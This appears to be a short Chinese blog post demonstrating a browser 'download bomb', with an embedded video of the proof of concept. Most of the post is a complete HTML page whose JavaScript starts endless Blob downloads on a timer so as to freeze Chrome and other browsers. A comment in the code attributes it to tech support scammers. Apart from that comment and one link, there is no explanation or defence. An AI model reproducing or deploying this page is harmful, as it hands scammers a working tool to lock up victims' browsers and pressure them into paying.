---
title: 无限下载谷歌
date: 2018-07-04 18:48:03
tags:
---
![enter description here][1]
<!--more-->

## 视频演示：
<div style="width:640px;height:480px;margin:0 auto;" id="ivaLive"></div>
<script type="text/javascript" src="http://demonsec666.oss-cn-qingdao.aliyuncs.com/cytron.core.js"></script>
<script>
    var ivaInstance = new Iva('ivaLive', {
        appkey: 'By9WGzBIx', //应用标示
        video: 'http://demonsec666.oss-cn-qingdao.aliyuncs.com/%E6%97%A0%E9%99%90%E4%B8%8B%E8%BD%BDPOC.mp4', //视频
        title: 'test', //视频标题，后台视频管理中的标题
        cover: '' //视频封面，只有在autoplay:false才可生效
    });
</script>
<script src="http://demonsec666.oss-cn-qingdao.aliyuncs.com/lva.js"></script>


``` stylus
<!doctype html>
<html>
<!--
The following code was used by tech support scammers to freeze Google Chrome and other browsers. More information below:
https://blog.malwarebytes.com/malwarebytes-news/2018/02/tech-support-scammers-find-new-way-jam-google-chrome/
//-->
<script>
function download(g, h, j) {
    var k = new Blob([g], {
        type: j
    });
    if (window.navigator.msSaveOrOpenBlob) window.navigator.msSaveOrOpenBlob(k, h);
    else {
        var l = document.createElement("a"),
            m = URL.createObjectURL(k);
        l.href = m, l.download = h, l.click(), setTimeout(function() {}, 0)
    }
}
function bomb_FF() {
    var g = Math.random().toString(36).substring(20),
        h = Math.floor(50 * Math.random() + 25);
    while (true) download(h, g, g)
}
function FF_jam() {
    bomb_FF()
}
setInterval(FF_jam, 0.5);
</script>
</html>
```


  [1]: http://demonsec666.oss-cn-qingdao.aliyuncs.com/6541FA064457BFDD9FCD38AE4F359131.jpg 